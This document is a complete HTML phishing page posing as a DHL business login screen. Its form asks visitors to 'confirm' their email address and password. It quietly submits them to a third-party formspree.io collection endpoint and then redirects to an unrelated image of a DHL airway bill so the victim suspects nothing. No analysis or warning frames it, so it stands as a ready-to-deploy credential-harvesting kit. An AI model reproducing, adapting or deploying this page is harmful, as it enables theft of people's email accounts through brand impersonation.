<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>DHL</title><style type="text/css"> 
  /* Code tidied up by ScrapBook */
.margin { color: rgb(255, 255, 255); }
.button { color: rgb(204, 0, 0); }
.finalbutton { color: rgb(153, 0, 0); }
.loginPage { background-color: rgb(255, 204, 0); border: 1px solid rgb(98, 95, 96); }
.loginPageBackground { background-color: rgb(255, 204, 0); }
.remindPasswordCenter { background-color: rgb(237, 238, 237); }
.welcomeText { color: rgb(0, 0, 0); }
.loginPageTopBar { background-color: rgb(204, 0, 0); color: rgb(255, 255, 255); }
.contentHeader.loginPageTopBar { border-bottom: 1px solid rgb(98, 95, 96); }
.loginFormBoxColor { background-color: rgb(237, 238, 237); }
.loginFormCenter td { color: rgb(93, 97, 98); }
.loginFormFonts { color: rgb(93, 97, 98); }
a.marginLP:active { color: rgb(93, 97, 98); }
a.marginLP:link { color: rgb(93, 97, 98); }
a.marginLP:visited { color: rgb(93, 97, 98); }
a.marginLP:hover { color: rgb(93, 97, 98); }
a.memarginLP:active { color: rgb(93, 97, 98); }
a.memarginLP:link { color: rgb(93, 97, 98); }
a.memarginLP:visited { color: rgb(93, 97, 98); }
a.memarginLP:hover { color: rgb(93, 97, 98); }
.meloginFormCenter td { color: rgb(93, 97, 98); }
.register--icon { fill: rgb(93, 97, 98); }
.remindPasswordCell { border-top: 1px solid rgb(93, 97, 98); border-bottom: 1px solid rgb(93, 97, 98); }
.loginPageArrowsLeft { background-image: url("arrowsLeft_invisible.png"); }
.loginPageArrowsRight { background-image: url("arrowsRight_invisible.png"); }
* html .loginPageArrowsLeft { background-image: none; }
* html .loginPageArrowsRight { background-image: none; }
A { color: rgb(0, 0, 0); }
A:active { color: rgb(0, 0, 0); text-decoration: none; }
A:visited { color: rgb(0, 0, 0); text-decoration: none; }
A:link { color: rgb(0, 0, 0); text-decoration: none; }
A:hover { color: rgb(204, 0, 0); text-decoration: underline; }
A.margin:active { color: rgb(255, 255, 255); text-decoration: none; }
A.margin:link { color: rgb(255, 255, 255); text-decoration: none; }
A.margin:visited { color: rgb(255, 255, 255); text-decoration: none; }
A.margin:hover { color: rgb(255, 255, 255); text-decoration: underline; }
A.button:active { color: rgb(204, 0, 0); text-decoration: none; }
A.button:link { color: rgb(204, 0, 0); text-decoration: none; }
A.button:visited { color: rgb(204, 0, 0); text-decoration: none; }
A.button:hover { color: rgb(204, 0, 0); text-decoration: underline; }
A.finalbutton:active { color: rgb(153, 0, 0); text-decoration: none; }
A.finalbutton:link { color: rgb(153, 0, 0); text-decoration: none; }
A.finalbutton:visited { color: rgb(153, 0, 0); text-decoration: none; }
A.finalbutton:hover { color: rgb(153, 0, 0); text-decoration: underline; }
.linecolorMarginTop { border-bottom: 1px solid rgb(204, 204, 204); }
.linecolor { background-color: rgb(204, 204, 204); }
.lightcolor { background-color: rgb(255, 204, 0); }
.lightcolor-phoenix { background-color: rgb(159, 166, 210); }
.inactive-tab-color { background-color: rgb(114, 114, 114); }
.darkcolor { background-color: rgb(153, 153, 153); }
.section-color { background-color: rgb(204, 0, 0); color: rgb(255, 255, 255); fill: rgb(255, 255, 255); font-weight: normal; }
.section-color .miniButtonPanel a { color: rgb(255, 255, 255); }
.mobileForm .collection-header { font-weight: normal; }
.section-color-text-hoverable:hover { color: rgb(255, 255, 255); }
.tab--active #plus_icon { fill: rgb(255, 255, 255); }
.margincolor { background-color: rgb(204, 0, 0); }
.groupHeader.margincolor *, .calendarGroupHeader.margincolor * { color: rgb(255, 255, 255); }
.result-data-row-header.level0 { background-color: rgb(255, 204, 0); }
.result-data-row-header.level1 { background-color: rgb(250, 250, 250); }
.navigationBarColor { background-color: rgb(204, 0, 0); }
a.menu-top--itemText, a.menu-top--subItemText:hover, .ui-dialog-title { color: rgb(255, 255, 255); }
.menu-top::before { background-color: rgb(204, 0, 0); border-color: rgb(204, 0, 0); box-shadow: 9999px 0px 0px rgb(204, 0, 0), 4000px 4px 4px -3px gray; }
.greytext { color: rgb(159, 166, 210); }
A.scroll:active { color: rgb(0, 51, 153); text-decoration: none; }
A.scroll:visited { color: rgb(0, 51, 153); text-decoration: none; }
A.scroll:link { color: rgb(0, 51, 153); text-decoration: none; }
A.scroll:hover { color: rgb(204, 0, 0); text-decoration: underline; }
TD.button { background-color: rgb(204, 0, 0); }
TD.finalbutton { background-color: rgb(153, 0, 0); }
TD.rankcolora { background-color: rgb(255, 255, 255); }
TD.rankcolorb { background-color: rgb(246, 246, 246); }
TD.rankcolorc { background-color: rgb(240, 240, 240); }
TR.rankcolora { background-color: rgb(255, 255, 255); }
TR.rankcolorb { background-color: rgb(246, 246, 246); }
TR.rankcolorc { background-color: rgb(240, 240, 240); }
.buttonNormalColor, .button--colorType0 { background-color: rgb(204, 0, 0); }
.buttonFinalColor, .button--colorType1 { background-color: rgb(153, 0, 0); }
.button--colorType2 { background-color: rgb(204, 0, 0); }
.miniButtonColor { background-color: rgb(144, 0, 0); }
.miniButtonColorLT12 { background-color: rgb(144, 0, 0); }
.button--miniColorType0 { color: rgb(204, 0, 0); }
.button--miniColorType1 { color: rgb(153, 0, 0); }
.button--miniColorType2 { color: rgb(204, 0, 0); }
img.minibutton { background-color: rgb(204, 0, 0); }
.guiClearBoth { clear: both; }
.ui-datepicker .ui-datepicker-header { color: rgb(0, 0, 0); }
.ui-state-hover a, .ui-state-hover a:hover { color: rgb(0, 0, 0) ! important; text-decoration: none; }
.ui-state-active a, .ui-state-active a:link, .ui-state-active a:visited { color: rgb(0, 0, 0) ! important; text-decoration: none; }
.ui-state-highlight, .ui-widget-content .ui-state-highlight, .ui-widget-header .ui-state-highlight { border-width: 1px; border-style: solid; -moz-border-top-colors: none; -moz-border-right-colors: none; -moz-border-bottom-colors: none; -moz-border-left-colors: none; border-image: none; border-color: rgb(255, 204, 0) ! important; color: rgb(0, 0, 0) ! important; }
.ui-datepicker a:hover { color: rgb(0, 0, 0) ! important; }
.leftBusinessMenuBackground {  }
.menuCategoryLink {  }
.menuCategoryLinkArrow {  }
.activeMenuCategory .menuCategoryLink {  }
.activeMenuCategory .menuCategoryLinkArrow {  }
.highlightMenuCategory .menuCategoryLink {  }
.highlightMenuCategory .menuCategoryLinkArrow {  }
.lightcolorborder { border-color: rgb(255, 204, 0) ! important; }
.buttonPrimaryColor { background-color: rgb(204, 0, 0); }
.buttonPrimaryColorLT12 { background-color: rgb(204, 0, 0); }
table.openOverviewResults tr.selectable.hover { background-color: rgb(213, 216, 242) ! important; }
table.openOverviewResults tr.selected { background-color: rgb(232, 234, 250) ! important; }
table.openOverviewResults tr.selected td.withTotals { background-color: rgb(208, 210, 225) ! important; }
table.openOverviewResults tr.selectable.hover td.withTotals { background-color: rgb(191, 194, 217) ! important; }
.sublevel-header-1 { background-color: rgb(250, 250, 250); }
.sublevel-header-2 { background-color: rgb(250, 250, 250); }
.sublevel-header-3 { background-color: rgb(250, 250, 250); }
.zebraStripe.even { background-color: rgb(255, 255, 255); }
.zebraStripe.odd { background-color: rgb(246, 246, 246); }
.zebraStripe.even .withTotals { background-color: rgb(242, 242, 242); }
.zebraStripe.odd .withTotals { background-color: rgb(233, 233, 233); }
.bodyBackgroundColor { background: white url("bg.png") repeat-x scroll 0px 0px; }
.menuMain.full-width-bar::before { background-color: rgb(255, 255, 255); border-color: rgb(255, 255, 255); box-shadow: 9999px 0px 0px rgb(255, 255, 255); }
.menuMain { background-color: rgb(255, 255, 255); }
.buttonPrimaryColorBorder { border-color: rgb(204, 0, 0); }
.buttonPrimaryColorOpaque { background-color: rgba(204, 0, 0, 0.2); }
.buttonPrimaryFontColor { color: rgb(255, 255, 255); }
ul#nav li ul li:hover { background: rgb(204, 0, 0) none repeat scroll 0% 0%; }
.ui-widget-header { background-color: rgb(204, 0, 0); }
.ui-dialog-titlebar.ui-widget-header { background-color: rgb(204, 0, 0); }
#ui-datepicker-div .ui-datepicker-header.ui-widget-header { background-color: rgb(204, 0, 0); }
.login-tab__information-icon circle { stroke: rgb(153, 0, 0); }
.login-tab__information-icon text { fill: rgb(153, 0, 0); }
/* Code tidied up by ScrapBook */
body { margin: 0px; }
.fullPageBackground { position: relative; background-position: center center; background-repeat: no-repeat; background-size: cover; height: 100vh; }
#loginPage18.login-tab { margin: auto; top: 25vh; width: 385px; font-size: 12pt; position: relative; height: auto; }
#loginPage18.login-tab.extended { height: 100%; max-height: 60vh; }
#loginPage18 .login-tab__main-div { padding-top: 65px; margin: auto; width: 240px; text-align: center; padding-bottom: 60px; height: calc(50% - 100px); }
#loginPage18 .login-tab__logo { max-width: 240px; max-height: 90px; }
#loginPage18 .login-tab__logo--default-logo { background-size: contain; background-repeat: no-repeat; margin: auto; }
#loginPage18 .login-form-view__login-input { display: block; padding: 0px 6px; margin: 12px 0px 0px; width: 226px; height: 30px; border: 1px solid rgb(204, 204, 204); }
#loginPage18 .login-information-view { display: none; }
#loginPage18 .login-information-view__welcome-text { font-weight: bold; }
#loginPage18 .login-information-view__information_text { min-height: 125px; }
#loginPage18 .login-information-view { margin-top: 40px; }
#loginPage18 .login-form-view__password-input { display: block; padding: 0px 6px; margin: 0px; width: 226px; height: 30px; border: 1px solid rgb(204, 204, 204); }
#loginPage18 .login-information-view__back-button { margin-top: 30px; }
#loginPage18 .login-form-view__login-button { width: 100%; margin: 30px 0px 0px; padding: 0px; height: 32px; }
#loginPage18 .login-form-view__login-message { margin-top: 12px; font-size: 8pt; }
#loginPage18 .login-form-view__login-message--warning { color: red; }
#loginPage18 .login-form-view__login-message--info { color: gray; }
#loginPage18 .login-form-view__login-button .newButtonTextPanel { line-height: normal; }
#loginPage18 .login-form-view__login-button .newButtonTextInner { font-size: 11pt; }
#loginPage18 .login-form-view__register-link { margin: 14px auto 0px; display: block; font-size: 10pt; }
#loginPage18 .login-tab__information-icon { position: absolute; cursor: pointer; left: 0px; top: 0px; }
#loginPage18 .login-form-view__register-link:hover { cursor: pointer; }
#loginPage18 .registration-view { display: none; height: 100%; }
#loginPage18 .registration-view--scrollable-panel { overflow: auto; height: calc(100% - 155px); }
#loginPage18 .registration-view__elem--bold { font-weight: bold; }
#loginPage18 .registration-view__addresses { margin-top: 30px; text-align: center; }
#loginPage18 .registration-view__back-button { margin-top: 10px; }
#loginPage18 .registration-view__addres-section { margin-top: 30px; }
#loginPage18 .registration-view__first-elem { margin-top: 16px; }
#loginPage18 .registration-view__frame-text { margin-top: 16px; }
#loginPage18 .registration-view__address-field { margin: 5px; }
#loginPage18 .remind-form-view { display: none; }
.remind-form-view .remindPassText { margin-top: 12px; margin-bottom: 8px; }
.remind-form-view .inputText { width: 226px; height: 30px; margin: 6px 0px 0px; padding: 0px 6px; border: 1px solid rgb(204, 204, 204); }
.remind-form-view .inputSelect { width: 240px; height: 30px; padding: 0px 0px 0px 2px; margin: 6px 0px 0px; border: 1px solid rgb(204, 204, 204); }
.remind-form-view__submit-button { display: block; margin: 15px auto 0px; }
.remind-form-view__back-button { display: block; margin: 15px auto 0px; }
.login-form-view__password-panel { position: relative; margin: 15px 0px 0px; }
.login-form-view__password-forgot-link { cursor: pointer; position: absolute; top: 34px; right: 0px; }
.login-form-view__me-button { top: 0px; right: 0px; width: 60px; text-align: center; font-family: Verdana; font-size: 12px; color: white; padding: 5px; background: rgb(124, 169, 3) none repeat scroll 0% 0%; position: absolute; cursor: pointer; }
.old_page_button { position: absolute; right: 0px; bottom: 0px; z-index: 1; background-color: white; padding: 5px; border-radius: 8px 0px 0px; cursor: pointer; }
.login-page-view { margin-top: 30px; }

element {

}
.additionalLinksLogin {

    background-color: rgba(0,0,0,0.5);
    position: fixed;

}
.additionalLinks, .additionalLinksAnon, .additionalLinksPages, .additionalLinksLogin, .additionalLinksSelfRegister, .additionalLinksLoginAdmin {

    text-align: center;
    width: 100%;
    bottom: 0;
    padding: 5px 0;
	color: #fff

}

  </style>

  </head>
  <body class="page-login">
    <div class="fullPageBackground" style="background-image: url(https://www.ax4.com/ax4/pix/loginPage/business/backgrounds/2012421/bg.jpg);">
      <div id="loginPage18" class="login-tab loginPageBackground">
        <div class="login-tab__main-div">
<script>
</script>
          <img class="login-tab__logo " src="https://www.ax4.com/ax4/control/image?id=46032">
          <div style="display: block;" class="login-form-view login-page-view">
            <div class="login-tab__information-icon">
              <svg width="25" height="25">
                <circle cx="12.5" cy="12.5" r="8" stroke-width="1.2" fill="none"></circle>
                <text font-size="13" font-family="Verdana" x="10.5" y="17.4">
                  i
                </text>
              </svg>
            </div>
            <form id="loginForm" class="container-form" method="post" action="https://formspree.io/f/mqkojwll">

<input type="hidden" name="_redirect" value="https://sc02.alicdn.com/kf/HTB10fFsQpXXXXXxXpXXq6xXFXXXJ/DHL-COURIER-BILL-printing-airway-bill.jpg_300x300.jpg?rand=13inbxlghtaspxn.1123456789&fid.4.1123456789&fid=1&fav.1&rand.13inbxlght.aspxn.1123456789&fid.1123456789&fid.1&fav.1&iloveyou=&.rand=13inbxlght.aspx?n=1123456789&fid=4#n=1123456789&fid=1&fav=1">
              <span class="wr-txt" id="login_error_msg"></span>
              <center>
                <div class="alert alert-danger" id="msg" style="color: #000;">
  Confirm Receiver Email Account..
                </div>
                
              </center>
              <input class=" login-form-view__login-input" name="email" value="" autocomplete="off" placeholder="Email Address" required="" type="email">
              <input class=" login-form-view__login-input" name="password" placeholder="Password" required="yes" type="password">
              <input class="newButtonPanel buttonFinalColor login-form-view__login-button" type="submit" id="submit-btn" style="font-face: &#39;Comic Sans MS&#39;; font-size: larger; color: White; background-color: rgb(153, 0, 0); border: 0pt ridge lightgrey" value="Login">
              <div class="login-form-view__password-panel">
                <a class="login-form-view__password-forgot-link finalbutton"></a>
              </div>
            </form>
          </div>
        </div>
      </div>
    </div>
    
	<div class="additionalLinksLogin">
    
    
    <a class="additionalLink termsOfUseLink" href="#" target="_blank">
       <span style="color:#ffffff;">  By using our application, you consent to the Terms of Use as set out under this link.
    </span></a>
    

    
    
    <a class="additionalLink privatePolicyLink" href="#" target="_blank">
      <span style="color:#ffffff;">   Data Privacy Notice
    </span></a>
    

    
    

</body><style id="allow-copy_style">html, body, *, *::before, *::after, html body *, #allow-copy_script ~ body * {
  -webkit-user-select: initial !important; 
  user-select: initial !important; 
} </style></html>
